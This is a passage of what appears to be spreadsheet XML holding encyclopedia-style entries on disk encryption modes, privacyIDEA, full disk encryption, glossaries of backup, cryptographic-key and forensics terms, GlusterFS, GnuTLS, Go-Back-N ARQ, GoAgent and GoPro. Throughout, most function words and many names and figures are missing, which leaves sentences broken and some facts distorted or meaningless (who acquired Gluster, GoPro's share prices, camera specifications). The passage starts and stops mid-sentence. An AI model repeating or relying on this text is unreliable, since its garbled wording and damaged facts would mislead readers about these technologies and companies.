{\displaystyle c'_{i}=p'_{i}\oplus 2^{i}m} {\displaystyle i=1,\ldots ,k-1} {\displaystyle c'_{0}=m_{c}\oplus i\oplus \bigoplus _{i=1}^{k-1}c'_{i}} final ciphertexts calculated: {\displaystyle c_{i}=e_{k}(c'_{i})\oplus 2^{i}l} {\displaystyle i=0,\ldots ,k-1} .note unlike single {\displaystyle considered standardization siswg. patented, favored primary supported mode. patents while authenticated encryption scheme iapm provides encryption well authentication tag, encryption component iapm mode completely describes schemes above, hence without ciphertext stealing aspect. this described detail figures patent 6,963,976. also data remanence cold boot attack disk encryption software disk encryption hardware ieee p1619, standardization project encryption storage data references further reading halevi rogaway, tweakable enciphering mode, crypto (lncs, volume 2729), 2003. halevi rogaway, parallelizable enciphering mode [5], 2003. standard architecture encrypted shared storage media, ieee project 1619 (p1619), [6]. siswg, draft proposal backup format [7], 2004. siswg, draft proposal tweakable wide-block encryption [8], 2004. james hughes, encrypted storage challenges methods alex halderman, seth schoen, nadia heninger, william clarkson, william paul, joseph calandrino, ariel feldman, jacob appelbaum, edward felten (2008-02-21). "lest remember: cold boot attacks encryption keys" (pdf). princeton university. archived original (pdf) 2008-05-14. {{cite journal}}: cite journal requires |journal= (help)cs1 maint: multiple names: authors list (link) niels fergusson (august 2006). "aes-cbc elephant diffuser: disk encryption algorithm windows vista" (pdf). microsoft. {{cite journal}}: cite journal requires |journal= (help) external links security storage working group siswg. "the estream project". retrieved 2010-03-28.</t>
  </si>
  <si>
    <t>PrivacyIDEA</t>
  </si>
  <si>
    <t>privacyidea factor authentication system multi-tenency- multi-instance-capable. opensource, written python hosted github. privacyidea linotp's fork 2014. fields privacyidea provides authentication backend various kinds applications (including ssh, vpn, well applications owncloud). thus meant replace classical proprietary factor authentication systems securid vasco. supports single sign-on saml. also possible login second factor windows desktops using privacyidea credential provider. installation privacyidea runs on-premises application linux system. quickly easily. debian, ubuntu redhat. authentication devices privacyidea supports wide variety authentication devices. amongst hardware tokens like feitian c200, yubikey yubico u2f/webauthn devices. many smartphone apps compliant hotp totp also supported. references</t>
  </si>
  <si>
    <t>Disk encryption</t>
  </si>
  <si>
    <t>disk encryption technology protects information converting unreadable code cannot deciphered easily unauthorized people. disk encryption uses disk encryption software hardware encrypt every data goes disk disk volume. used prevent unauthorized access data storage.the expression full disk encryption (fde) whole disk encryption) signifies everything disk encrypted, master boot record (mbr), similar area bootable disk, code starts operating system loading sequence, encrypted. some hardware-based full disk encryption systems truly encrypt entire boot disk, including mbr. transparent encryption transparent encryption, also known real-time encryption on-the-fly encryption (otfe), method used disk encryption software. "transparent" refers fact data automatically encrypted decrypted loaded saved. with transparent encryption, files accessible immediately provided, entire volume typically mounted physical drive, making files accessible unencrypted ones. data stored encrypted volume read (decrypted) without using correct password/keyfile(s) correct encryption keys. entire file system within volume encrypted (including file names, folder names, file contents, meta-data).to transparent end-user, transparent encryption usually requires device drivers enable encryption process. although administrator access rights normally required install drivers, encrypted volumes typically used normal users without rights.in general, every method data seamlessly encrypted write decrypted read, user and/or application software remains unaware process, called transparent encryption. disk encryption filesystem-level encryption disk encryption replace file encryption situations. disk encryption sometimes used conjunction filesystem-level encryption intention providing secure implementation. since disk encryption generally uses encrypting whole drive, data decrypted system runs. however, disk encryption solutions multiple keys encrypting different volumes. attacker gains access computer run-time, attacker access files. conventional file folder encryption instead allows different keys different portions disk. thus attacker cannot extract information still-encrypted files folders. unlike disk encryption, filesystem-level encryption typically encrypt filesystem metadata, directory structure, file names, modification timestamps sizes. disk encryption trusted platform module trusted platform module (tpm) secure cryptoprocessor embedded motherboard used authenticate hardware device. since chip unique particular device, capable performing platform authentication. used verify system seeking access expected system.a limited number disk encryption solutions support tpm. these implementations wrap decryption using tpm, thus tying hard disk drive (hdd) particular device. removed particular device placed another, decryption process fail. recovery possible decryption password token. although advantage disk cannot removed device, might create single point failure encryption. example, something happens motherboard, user would able access data connecting hard drive another computer, unless user separate recovery key. implementations there multiple tools available market allow disk encryption. however, vary greatly features security. they divided three main categories: software-based, hardware-based within storage device, hardware-based elsewhere (such host adaptor). hardware-based full disk encryption within storage device called self-encrypting drives impact performance whatsoever. furthermore, media-encryption never leaves device therefore available virus operating system. trusted computing group opal storage specification provides industry accepted standardization self-encrypting drives. external hardware considerably faster software-based solutions, although versions still performance impact, media encryption keys well protected. solutions boot drive require pre-boot authentication component available types solutions number vendors. important cases authentication credentials usually major potential weakness since symmetric cryptography usually strong. password/data recovery mechanism secure safe recovery mechanisms essential large-scale deployment disk encryption solutions enterprise. solution must provide easy secure recover passwords (most importantly data) case user leaves company without notice forgets password. challenge–response password recovery mechanism challenge–response password recovery mechanism allows password recovered secure manner. offered limited number disk encryption solutions. some benefits challenge–response password recovery: need user carry disc recovery encryption key. secret data exchanged recovery process. information sniffed. does require network connection, i.e. works users remote location. emergency recovery information (eri)-file password recovery mechanism emergency recovery information (eri) file provides alternative recovery challenge–response mechanism unfeasible cost helpdesk operatives small companies implementation challenges. some benefits eri-file recovery: small companies without implementation difficulties. secret data exchanged recovery process. information sniffed. does require network connection, i.e. works users remote location. security concerns most full disk encryption schemes vulnerable cold boot attack, whereby encryption keys stolen cold-booting machine already running operating system, dumping contents memory data disappears. attack relies data remanence property computer memory, whereby data bits take several minutes degrade power removed. even trusted platform module (tpm) effective attack, operating system needs hold decryption keys memory order access disk.full disk encryption also vulnerable computer stolen suspended. wake-up involve bios boot sequence, typically password. hibernation, contrast goes bios boot sequence, safe. software-based encryption systems vulnerable various side channel attacks acoustic cryptanalysis hardware keyloggers. contrast, self-encrypting drives vulnerable attacks since hardware encryption never leaves disk controller. also, full disk encryption schemes protect data tampering silent data corruption, i.e. bitrot). that means provide privacy, integrity. block cipher-based encryption modes used full disk encryption authenticated encryption concerns storage overhead needed authentication tags. thus, tampering would done data disk, data would decrypted garbled random data read hopefully errors indicated depending data tampered (for case metadata file system; case file data corresponding program would process file). ways mitigate concerns, file systems full data integrity checks checksums (like btrfs zfs) full disk encryption. however, cryptsetup started experimentally support authenticated encryption full disk encryption benefits full disk encryption several benefits compared regular file folder encryption, encrypted vaults. following benefits disk encryption: nearly everything including swap space temporary files encrypted. encrypting files important, reveal important confidential data. with software implementation, bootstrapping code cannot encrypted however. example, bitlocker drive encryption leaves unencrypted volume boot from, volume containing operating system fully encrypted. with full disk encryption, decision individual files encrypt left users' discretion. this important situations users might want might forget encrypt sensitive files. immediate data destruction, simply destroying cryptographic keys (crypto-shredding), renders contained data useless. however, security towards future attacks concern, purging physical destruction advised. boot problem issue address full disk encryption blocks operating system stored must decrypted boot, meaning available user interface password. most full disk encryption solutions utilize pre-boot authentication loading small, highly secure operating system strictly locked hashed versus system variables check integrity pre-boot kernel. some implementations bitlocker drive encryption make hardware trusted platform module ensure integrity boot environment, thereby frustrate attacks target boot loader replacing modified version. this ensures authentication take place controlled environment without possibility bootkit used subvert pre-boot decryption. with pre-boot authentication environment, used encrypt data decrypted external input system. solutions storing external include: username password using smartcard combination using biometric authentication method fingerprint using dongle store key, assuming user allow dongle stolen laptop dongle encrypted well using boot-time driver password user using network interchange recover key, instance part boot using store decryption key, preventing unauthorized access decryption subversion boot loader using combination aboveall possibilities varying degrees security; however, better unencrypted disk. also comparison disk encryption software digital forensics disk encryption hardware disk encryption software disk encryption theory encryption filesystem-level encryption hardware-based full disk encryption boucher single sign-on references further reading casey, eoghan; stellatos, gerasimos (2008). "the impact full disk encryption digital forensics". operating systems review. (3): 93–98. doi:10.1145/1368506.1368519. s2cid 5793873. external links presidential mandate requiring data encryption government agency laptops on-the-fly encryption: comparison reviews lists different features disk encryption systems (archived version january 2013) on-disk/full-disk encryption page covers dm-crypt/luks linux, starting theory ending many practical examples usage (archived version september 2015). buyer's guide full disk encryption overview full-disk encryption, works, differs file-level encryption, plus overview leading full-disk encryption software.</t>
  </si>
  <si>
    <t>Glossary of backup terms</t>
  </si>
  <si>
    <t>subject computer backups rife jargon highly specialized terminology. this page glossary backup terms aims clarify meaning jargon terminology. terms definitions 3-2-1 rule 3-2-1 backup strategy) idea minimal backup solution include three copies data, including local copies remote copy.backup policy organization's procedures rules ensuring adequate numbers types backups made, including suitably frequent testing process restoring original production system backup copies.backup rotation scheme method effectively backing data multiple media systematically moved storage usage backup process back storage. there several different schemes. each takes different approach balance need long retention period frequently backing changes. some schemes complicated others.backup site place business continue data loss event. such site ready access backups possibly even continuously updated mirror.backup software computer software applications used performing backing data, i.e., systematic generation backup copies. also: list backup software.backup window period time system available perform backup procedure. backup procedures detrimental effects system network performance, sometimes requiring primary system suspended. these effects mitigated arranging backup window users owners system(s).copy backup backs selected files, mark files backed (reset archive bit). this found backup windows 2003.daily backup incremental backup files changed todaydata salvaging/recovery process recovering data storage devices normal operational methods impossible. this process typically performed specialists controlled environments special tools. example, crashed hard disk still data even though work properly. data salvage specialist might able recover much original data opening clean room tinkering internal parts.differential backup cumulative backup changes made since last full backup. advantage quicker recovery time, requiring full backup latest differential backup restore system. disadvantage elapsed since last full backup, data needs backed especially majority data changed.disaster recovery process recovering business disaster restoring recreating data. main purposes creating backups facilitate successful disaster recovery. maximum effectiveness, process planned advance audited.disk cloning process copying contents computer hard disk another disk image file (see disk image below) later recovery.disk image single file storage device containing complete contents structure representing data storage medium device, hard drive, tape drive, floppy disk, cd/dvd/bd, flash drive.full backup backup (selected) files system. contrast drive image, included file allocation tables, partition structure boot sectors.hot backup backup database still running, changes made data backed some database engines keep record entries changed, including complete value. this used resolve changes made backup.incremental backup backup contains files changed since recent backup (either full incremental). advantage quicker backup times, changed files need saved. disadvantage longer recovery times, latest full backup, incremental backups date data loss need restored.media spanning sometimes backup larger single destination storage medium. case, must broken fragments distributed across multiple storage media.multiplexing practice combining multiple backup data streams single stream written single storage device. example, backing single tape drive once.multistreaming practice creating multiple backup data streams single system multiple storage devices. example, backing single database tape drives once.normal backup full backup used windows server 2003.near store provisionally backing data local staging backup device, possibly later archival backup remote store device.open file backup ability back file another application. file locking.remote store backing data offsite permanent backup facility, either directly live data source else intermediate near store device.restore time amount time required bring desired data back backup media.retention time amount time given data remain available restore. some backup products rely daily copies data measure retention terms days. others retain number copies data changes regardless amount time.site-to-site backup backup, internet, offsite location user's control. similar remote backup except owner data maintains control storage location.synthetic backup restorable backup image synthesized backup server previous full backup incremental backups since then. equivalent full backup would taken time last incremental backup.tape library storage device contains tape drives, slots hold tape cartridges, barcode reader identify tape cartridges automated method physically moving tapes within device. these devices store immense amounts data.trusted paper machine-readable print cryptographic key.virtual tape library (vtl) storage device appears tape library backup software, actually stores data means. configured temporary storage location data actually sent real tapes final storage location itself. also computer data storage data proliferation file synchronization information repository disaster recovery business continuity auditing digital preservation reversible computing references external links online backup glossary</t>
  </si>
  <si>
    <t>Glossary of cryptographic keys</t>
  </si>
  <si>
    <t>this glossary lists types keys term used cryptography, opposed door locks. terms primarily used u.s. national security agency marked (nsa). classification keys according usage cryptographic types. 40-bit length bits, upper limit could exported u.s. countries without license. considered insecure. size discussion lengths. authentication used keyed-hash message authentication code, hmac. benign (nsa) protected encryption means distributed without fear stolen. also called black key. content-encryption (cek) encrypted using kek, content message, audio, image, video, executable code, etc. crypto ignition storage device (ksd-64) shaped look like ordinary physical key. cryptovariable calls output stream cipher stream. often uses term cryptovariable bits control stream cipher, public cryptographic community calls key. data encryption (dek) used encrypt underlying data. derived keys computed applying predetermined hash algorithm derivation function password better, passphrase. used digital rights management protect media electronic (nsa) distributed electronic opposed paper) form. ekms. ephemeral exists within lifetime communication session. expired issued limited time frame (cryptoperiod parlance) passed and, hence, longer valid. firefly (nsa) keys used system based public cryptography. derivation function (kdf) function used derive secret value, e.g. derive diffie-hellman exchange. encryption (kek) used protect keys dek/tek used). production (kpk) -key used initialize keystream generator production electronically generated keys. fill (nsa) loading keys cryptographic device. fill device. master keys large group keys) derived. analogous physical open doors building. master encryption (mek) used encrypt dek/tek key. master encryption (mkek) used encrypt multiple keys. example, generate several wrap mkek export external openstack barbican. time (otp otpad) keying material long plaintext used once. truly random reused secure encryption method. one-time article. time password (otp) time password based prebuilt single code list based mathematical formula secret seed known parties, uses event time modify output (see totp/hotp). paper (nsa) keys distributed paper form, printed lists settings rotor machines, keys punched card paper tape formats. paper keys easily copied. walker ring, key. poem keys used agents world form poem easy remember. marks. public/private public cryptography, separate keys used encrypt decrypt message. encryption (public key) need kept secret published. decryption private must kept secret maintain confidentiality. public keys often distributed signed public certificate. pre-placed (nsa) large numbers keys (perhaps year's supply) loaded encryption device allowing frequent change without refill. (nsa) symmetric format easily copied, e.g. paper unencrypted electronic key. opposite black benign key. revoked public longer used, typically owner longer role issued compromised. such keys placed certificate revocation list crl. session used message entire communications session. traffic encryption key. symmetric used encrypt decrypt message. symmetric keys typically used cipher must kept secret maintain confidentiality. traffic encryption (tek)/data encryption (dek) symmetric used encrypt messages. teks typically changed frequently, systems daily others every message. session key. used specify data form type communication payloads anywhere else). transmission security (tsk) (nsa) seed pseudorandom number generator used control radio frequency hopping direct-sequence spread spectrum modes. have quick, sincgars, electronic warfare. seed (nsa) used initialize cryptographic device accept operational keys using benign transfer techniques. also used initialize pseudorandom number generator generate keys. signature public cryptography also used electronically sign messages. private used create electronic signature, public used verify signature. separate public/private pairs must used signing encryption. former called signature keys. stream output stream cipher opposed cryptovariable parlance) controls cipher training (nsa) unclassified used instruction practice exercises. type (nsa) keys used protect classified information. type product. type (nsa) keys used protect sensitive unclassified (sbu) information. type product. vernam type invented gilbert vernam 1918. stream key. zeroized erased (see zeroisation.) also specific encryption systems ciphers types associated them, e.g. key, key, key, key, baton key, kerberos key, etc. category:cryptographic algorithms category:cryptographic protocols references schneier, bruce. applied cryptography, second edition, john wiley sons, 1996. isbn 0-471-11709-9 national information assurance (ia) glossary, committee national security systems, cnss instruction 4009, 2010. link joint management plan, cjcsm 6520.01a, 2011</t>
  </si>
  <si>
    <t>Glossary of digital forensics terms</t>
  </si>
  <si>
    <t>digital forensics branch forensic sciences related investigation digital devices media. within field number "normal" forensics words re-purposed, specialist terms evolved. acquisition process creating duplicate copy digital media purposes examining computational forensics computational forensics digital forensics artificial intelligence. digital media used within fields refer physical medium (such hard drive) data storage device e-discovery ediscovery common acronym electronic discovery exhibit digital media seized investigation usually referred "exhibit" hashing within field "hashing" refers hash functions (e.g. crc, sha1 md5) verify "image" identical source media image duplicate copy digital media created part forensic process imaging synonym "acquisition" live analysis analysis piece digital media within itself; often used acquire data would lost upon shutting device slack space unused space file file system uses fixed size clusters file smaller fixed block size unused space simply left). often contains deleted information previous uses block steganography word steganography comes greek name “steganos” (hidden secret) “graphy” (writing drawing) literally means hidden writing. steganography uses techniques communicate information hidden. unallocated space clusters media partition storing active files. they contain pieces files deleted file partition removed physical disk verification term used refer hashing source media acquired image verify accuracy copy write blocker common name used forensic disk controller, hardware used access digital media read fashion references</t>
  </si>
  <si>
    <t>Glulx</t>
  </si>
  <si>
    <t>glulx 32-bit portable virtual machine intended writing playing interactive fiction. designed andrew plotkin relieve restrictions venerable z-machine format. example, z-machine provides native support 16-bit integers, glulx natively supports 32-bit integers. versions popularity inform compiler, starting version 6.30, produce either z-machine glulx story files. spanish interactive fiction development system called superglús also uses glulx. despite better-adapted virtual machine modern computing hardware accessible developers, glulx continues behind z-machine popularity, largely comparative rarity interpreters. popular interpreter glulx andrew plotkin's glulxe. glulxe uses input output. file email extensions mime type glulx "application/x-glulx". glulx files file extension .ulx, commonly archived blorb packages. blorb packages containing glulx work, accepted file extensions .gblorb, .glb, .blorb .blb. former extensions intended make easy interpreters figure type game inside blorb file. references external links glulx specification glulx games "baf's guide" interpreters glulx games</t>
  </si>
  <si>
    <t>GlusterFS</t>
  </si>
  <si>
    <t>gluster inc. (formerly known research) software company provided open source platform scale-out public private cloud storage. company privately funded headquartered sunnyvale, california, engineering center bangalore, india. gluster funded nexus venture partners index ventures. gluster acquired october 2011. history name gluster comes combination terms cluster. despite similarity names, gluster related lustre file system incorporate lustre code. gluster based product glusterfs, open-source software-based network-attached filesystem deploys commodity hardware. initial version glusterfs written anand babu periasamy, gluster's founder cto. 2010 golub became president chief executive officer.red became primary author maintainer glusterfs open-source project acquiring gluster company october 2011. product first marketed storage server, early 2015 renamed gluster storage since also acquired ceph file system technology. architecture glusterfs architecture aggregates compute, storage, resources global namespace. each server plus attached commodity storage (configured direct-attached storage, jbod, using storage area network) considered node. capacity scaled adding additional nodes adding additional storage node. performance increased deploying storage among nodes. high availability achieved replicating data n-way nodes. public cloud deployment public cloud deployments, glusterfs offers amazon services (aws) amazon machine image (ami), deployed elastic compute cloud (ec2) instances rather physical servers underlying storage amazon's elastic block storage (ebs). environment, capacity scaled deploying storage units, performance scaled deploying instances, availability scaled n-way replication availability zones. private cloud deployment typical on-premises, private cloud deployment consist glusterfs installed virtual appliance multiple commodity servers running hypervisors kvm, xen, vmware; bare metal. glusterfs glusterfs scale-out network-attached storage file system. found applications including cloud computing, streaming media services, content delivery networks. glusterfs developed originally gluster, inc. hat, inc., result acquiring gluster 2011.in june 2012, storage server announced commercially supported integration glusterfs enterprise linux. bought inktank storage april 2014, company behind ceph distributed file system, re-branded glusterfs-based storage server "red gluster storage". design glusterfs aggregates various storage servers ethernet infiniband rdma interconnect large parallel network file system. free software, parts licensed general public license (gpl) others dual licensed either lesser general public license (lgpl) glusterfs based stackable user space design. glusterfs client server component. servers typically deployed storage bricks, server running glusterfsd daemon export local file system volume. glusterfs client process, connects servers custom protocol tcp/ip, infiniband sockets direct protocol, creates composite virtual volumes multiple remote servers using stackable translators. default, files stored whole, striping files across multiple remote volumes also possible. client mount composite volume using glusterfs native protocol fuse mechanism using protocol using built-in server translator, access volume gfapi client library. client re-export native-protocol mount, example kernel nfsv4 server, samba, object-based openstack storage (swift) protocol using "ufo" (unified file object) translator. most functionality glusterfs implemented translators, including file-based mirroring replication, file-based striping, file-based load balancing, volume failover, scheduling disk caching, storage quotas, volume snapshots user serviceability (since glusterfs version 3.6). glusterfs server intentionally kept simple: exports existing directory as-is, leaving client-side translators structure store. clients stateless, communicate other, expected translator configurations consistent other. glusterfs relies elastic hashing algorithm, rather using either centralized distributed metadata model. user add, delete, migrate volumes dynamically, helps avoid configuration coherency problems. this allows glusterfs scale several petabytes commodity hardware avoiding bottlenecks normally affect tightly coupled distributed file systems. glusterfs provides data reliability availability various kinds replication: replicated volumes geo-replication. replicated volumes ensure exists least copy file across bricks, fails, data still stored accessible. geo-replication provides master-slave model replication, volumes copied across geographically distinct locations. this happens asynchronously useful availability case whole data center failure. glusterfs used foundation academic research survey article.red markets software three markets: "on-premises", public cloud "private cloud". also references external links official website</t>
  </si>
  <si>
    <t>SparkleShare</t>
  </si>
  <si>
    <t>sparkleshare open-source cloud storage file synchronization client app. default, uses storage backend. sparkleshare comparable dropbox, cloud storage provided user's server, hosted solution github. advantage self-hosting user retains control data. simplest case, self-hosting requires git. sparkleshare's support android devices hold lack developer resources. also comparison file hosting services comparison file synchronization software comparison online backup services references external links official website howto sparkleshare ubuntu</t>
  </si>
  <si>
    <t>GnuTLS</t>
  </si>
  <si>
    <t>gnutls transport layer security library) free software implementation tls, dtls protocols. offers application programming interface (api) applications enable secure communication network transport layer, well interfaces access x.509, pkcs #12, openpgp structures. features gnutls consists library allows client applications start secure sessions using available protocols. also provides command-line tools, including x.509 certificate manager, test client server, random password generators. gnutls following features: 1.3, 1.2, 1.1, 1.0, protocols datagram (dtls) 1.2, dtls 1.0, protocols tls-srp: secure remote password protocol (srp) authentication tls-psk: pre-shared (psk) authentication x.509 openpgp certificate handling assisted cryptography cryptographic accelerator support (/dev/crypto), padlock aes-ni instruction sets support smart cards hardware security modules storage cryptographic keys system's trusted platform module (tpm) history origin gnutls initially created around march 2003 nikos mavrogiannopoulos allow applications project secure protocols tls. although openssl already existed, openssl's license compatible gpl; thus software gpl, software, could openssl without making linking exception. license gnutls library licensed originally lesser general public license included applications general public license. august 2011 library updated lgplv3. after noticed license compatibility problems introduced, especially free software license change, discussions license downgraded lgplv2.1 march 2013. split gnutls created project, december 2012 maintainer, nikos mavrogiannopoulos, dissociated project policy disputes free software foundation. richard stallman opposed move suggested forking project instead. soon afterward, developer paolo bonzini ended maintainership grep, expressing concerns similar gnutls maintainer mavrogiannopoulos. deployment software packages using gnutls include(d): gnome centerim exim weechat mutt wireshark slrn lynx cups gnomint emacs synology diskstation manager openconnect also comparison implementations wolfssl (previously cyassl) mbed (previously polarssl) list free open-source software packages network security services references external links official website friends interview developer nikos mavroyanopoulos 2003 interview fellowship interview simon josefsson 2009 interview</t>
  </si>
  <si>
    <t>Go-Back-N ARQ</t>
  </si>
  <si>
    <t>go-back-n specific instance automatic repeat request (arq) protocol, sending process continues send number frames specified window size even without receiving acknowledgement (ack) packet receiver. special case general sliding window protocol transmit window size receive window size transmit frames peer requiring ack. receiver process keeps track sequence number next frame expects receive. discard frame exact sequence number expects (either duplicate frame already acknowledged, out-of-order frame expects receive later) send last correct in-order frame. once sender sent frames window, detect frames since first lost frame outstanding, back sequence number last received receiver process fill window starting frame continue process again. go-back-n efficient connection stop-and-wait arq, since unlike waiting acknowledgement packet, connection still utilized packets sent. words, time would otherwise spent waiting, packets sent. however, method also results sending frames multiple times frame lost damaged, acknowledging lost damaged, frame following frames send window (even received without error) re-sent. avoid this, selective repeat used. pseudocode these examples assume infinite number sequence request numbers. window size request number sequence number sequence base sequence function receiver following forever: packet received packet error free accept packet send higher layer else refuse packet send request function sender repeat following steps forever: receive request number packet transmission transmit packet packets transmitted order. choosing window size there things keep mind choosing value sender must transmit fast. bounded receiver’s ability process packets. must smaller number sequence numbers numbered zero verify transmission cases packet (any data packet) dropped. given bounds presented (2), choose largest number possible. references also reliable data transfer pipeline (software) automatic repeat request computer networking selective repeat external links go-back-n demonstration java applet</t>
  </si>
  <si>
    <t>GoAgent</t>
  </si>
  <si>
    <t>goagent open-source cross-platform network access software. mainly written python supports windows, linux linux-based like android openwrt. uses google engine servers provide users free proxy service gain access blocked information. normally used browsers. goagent eventually shut request chinese enforcement. project called xx-net claims reborn goagent", first release january 2015. references external links goagent website goagent github</t>
  </si>
  <si>
    <t>Sparkle (software)</t>
  </si>
  <si>
    <t>sparkle open-source software framework macos designed simplify updating software user program. sparkle's primary means distributing updates "appcasting," term coined practice using enclosure distribute updates release notes. 2013, development sparkle ended original author, later picked newly formed sparkle project open source group github june 2014 official continuation project. other alternatives there several open source windows alternatives offer similar functionality sparkle: wyupdate (bsd licensed) tandem automaticupdater (lgpl licensed) winsparkle (mit licensed)there also realbasic implementation sparkle works macos, windows linux: rbsparkle. references external links sparkle homepage sparkle development page github sparkle macupdate</t>
  </si>
  <si>
    <t>GoPro</t>
  </si>
  <si>
    <t>gopro, inc. (marketed gopro sometimes stylized gopro) american technology company founded 2002 nick woodman. manufactures action cameras develops mobile apps video-editing software. founded woodman labs, inc, company eventually focused connected sports genre, developing line action cameras and, later, video editing software. based mateo, california. developed quadcopter drone, karma, released october 2016. january 2018, karma discontinued. also january 2018, company hired jpmorgan chase pursue options selling company. however, month later, denied this. gopro continued business manufacturing action cameras. history company founded nick woodman 2002. motivated 2002 surfing trip australia hoping capture high quality action photos, could amateur photographers could close enough appropriate quality equipment reasonable prices. 'gopro' name came woodman surfing friends aspired become professional surfers 'going pro' ultimate goal filmed water time. camera range branded 'hero' capture close-up action shots made subject look like hero.woodman raised portion initial capital selling bead shell belts us$20 and, later, fashionable camera straps. also received $230,000 parents invest business.in 2004, company sold first camera system, used film. digital still video cameras later introduced. 2014, fixed-lens video camera wide 170-degree lens available; paired create video.on june 2014, company announced appointment former microsoft executive tony bates president reporting directly woodman.in january 2016, gopro partnered periscope live streaming.after growing number employees 2015, company responded weak sales fourth quarter cutting workforce (100 workers) january 2016.in november 2016, company announced laying additional employees effort reduce costs. company also announced president tony bates would stepping 2016. employees laid march 2017, additional layoffs followed january 2018, bringing company's workforce "just 1,000".at peak, share gopro valued $86, march 2018, $4.81.because covid-19 pandemic 2020, gopro laid percent workforce employees. corporate actions march 2011, gopro acquired cineform. acquisition included cineform video codec used film slumdog millionaire. company claimed codec "makes editing faster convenient without sacrificing image quality". incorporated company's hero system shortly acquisition.in march 2013, gopro issued dmca takedown notice website digitalrev.com, posted review product, citing trademark breach copyright. this notice retracted days later, citing "erroneous enforcement".on april 2015, gopro acquired kolor, spherical media virtual reality startup based chambéry, france. kolor developers autopano, autopano video panotour. after september 2018, kolor products longer sale kolor products would longer receive updates.on february 2016, gopro spent $105 million acquired start-ups—stupeflix vemory—for video editing tools replay splice.in march 2020, gopro acquired stabilization software company, reelsteady. february 2014, gopro submitted confidential filing initial public offering (ipo) securities exchange commission (sec).on 2014, gopro filed form without specifying number shares price. company stated hoped raise least $100 million sale shares, using money debt full ($111 million march 2014) acquire invest complementary businesses, technologies assets". they said planned list nasdaq stock exchange using symbol 'gpro.'the expected price range share; june 2014, gopro sold 17.8 million shares initial investors share (totaling $427.2m). price company valued $2.95 billion.one reason gopro's decision public potential become media company generate additional revenue content cameras create. product lines hero cameras woodman worked first camera years founding company, eventually introducing gopro 35mm hero september 2004 diego's action sports retailer trade show. first year gopro sold $150,000 worth products. 2006 company introduced first digital hero, second video capability, generated $800,000 revenue. following year gopro sales quadrupled $3.4 million.in 2014, company selling hero3+ editions different colors. capable filming 16:9 aspect ratio, supporting video still photographs. hero4 introduced september 2014.on september 2017, gopro released hero6 black, claims improved stabilization hero5 models capable capturing video fps. september 2018, gopro came hero7 black, apart providing improved stabilization hero6 models hypersmooth, also featured form video capturing, "timewarp", providing high speed effect videos. hero7 also came capability stream live across multiple platforms like facebook youtube july 2018, gopro announced sold million hero cameras since inception.on october 2019 gopro released hero8 black, included improved in-camera stabilization hypersmooth 2.0. hero8 black introduced integrated mounting 'fingers' could folded use, also notable easily replaceable lens available gopro, though third party replacement lens available company called camera butter.on september 2020, gopro released hero black, reinstatement user-replaceable lens front-facing screen. gopro karma gopro karma grip gopro karma gopro's consumer drone, discontinuation january 2018. 2014, gopro entered discussions private label model built gopro branding. after failure negotiations, gopro entered agreement robotics (3dr) similar partnership based 3dr's flight controllers. failed meet agreed-upon timelines. result, gopro took full control development process mid-2015. scheduled released early 2016, gopro karma project delayed several times gopro karma announced introduction date october 2016. karma released along newer models hero5 session cameras features removable handheld stabilizer (gimbal) integrated design. after customers complained power failure operation, gopro recalled karma drones gave customers full refunds.in february 2017, gopro re-launched karma drone. however, january 2018, gopro inc. said cutting percent global workforce putting drone business disappointing fourth quarter. company said expects sales $340 million, well short previous projection much $480 million average analyst estimate $472 million. their revenue took million discounting karma drones, well hero line cameras, holiday season. gopro 360° cameras november 2017, gopro launched fusion camera, omnidirectional camera capable recording 360-degree footage. fusion first gopro feature increased maximum resolution 5.8k. october 2019, gopro updated line-up introduction gopro max. accessories gopro produces various mounting accessories cameras including 3-way mount, suction cup, chest harness, jaws-type flexible clamp, harness, surfing mount, etc. video editing company developed gopro studio, simple video editing software edit camera footage. reported gopro intended also become content provider, also hero5 called gopro quik share, edit videos easier. also edit shoot photos videos using gopro released 2015. 2020 gopro canceled gopro quik software support windows mac, leaving mobile devices. april 2014, gopro listed adweek "top best brand channels youtube" based combination views, shares, comments overall engagement. content uploaded daily, additional source revenue company.as part transformation media company 2014, gopro created additional channels gopro content youtube, virgin america, xbox live. this extended playstation network 2015.gopro million followers across social media platforms products gopro originally designed surfing capturing camera angles, hence name. hero cameras notes 35mm 35mm camera (model #001) became available april 2005. dimensions inches weighed 0.45 pounds (200 included camera, clear case quick release, camera strap glove adapter lash. could pivot fly" functional depth water feet described "reusable wrist camera" included roll exposure kodak film. digital (1st gen) first generation digital hero cameras (2006–09) powered conventional batteries included rugged housing wrist strap. models distinguished still image resolution shot video standard definition (480 lines lower) aspect ratio. like film camera hero, first-generation digital hero cameras equipped optical viewfinder. original digital hero (dh1; 640×480 still resolution, 240p video 10-second clips) 2006 succeeded digital hero3 (dh3; 3-megapixel stills, 384p video) digital hero5 (dh5; 5-megapixel stills). three angle view. variant released extreme wide-angle lens 170° angular coverage diagonal wide hero; wide hero different housing first-gen cameras (dh1/dh3/dh5) accommodate larger lens. digital hero digital hero released 2006 (model: sq907 mini-cam) 640×480 camera shot qvga definition 320x240 fps) video maximum seconds. digital hero1 internal memory without slot. digital hero3 digital hero3, released february 2007, 3-megapixel camera shot standard definition 512×384 video. rated (98.4 feet) depth. digital hero5 digital hero5 first introduced 2008. megapixel still photo sensor supported standard definition (512×384) video capture. batteries, internal memory could function card. housing rated ft/30 meters depth. dimensions 1.75 1.25 inches mm). camera designed work newer hero line housings, although standard screw mounts indeed compatible. marketed basic camera housing wrist hero, bundled accessories motorsports hero. wide hero gopro wide hero first model 170° wide-angle lens. released 2008 alongside digital hero5 sensor (2592 1944), capable 512x384 30fps video sound recording min. card), photos, self timer, sequence still photo burst auto "photo every seconds" mode. powered batteries (not included box).the wide hero marketed basic camera housing alone, bundled accessories surf hero, motorsports hero wide, helmet hero wide). camera later renamed hero emphasize differences succeeding hero second generation cameras. (2nd gen) second generation hero cameras (2010–11) branded hero upgraded resolution, offering 1080p high-definition video. with hero generation, gopro dropped optical viewfinder. hero basic hero marketed either basic accessories (case mount) "naked", bundles additional accessories named intended purpose (such helmet hero, motorsports hero, surf hero). hero variants, camera shoots maximum 1080p video reduced field view (127°) sensor. alternative resolutions hero included 960p30, 720p60, 720p30, 480p60, wide-angle (170°) view previous-generation wide hero. first listed january 2010. hero specifications: sensor size: 1/2.5-inch (5.75 4.28 pixel size: connectivity: mini 2.0; component image formats:the hero also offered expansion port camera's rear panel, branded hero bus. optional accessories included bakpac, offered small monitor displayed played back video, battery bakpac, doubled battery life camera. hero hero reduced-cost version hero shoots maximum video resolution 960p30 compatible electronic accessories hero lacks proprietary hero expansion port, although camera 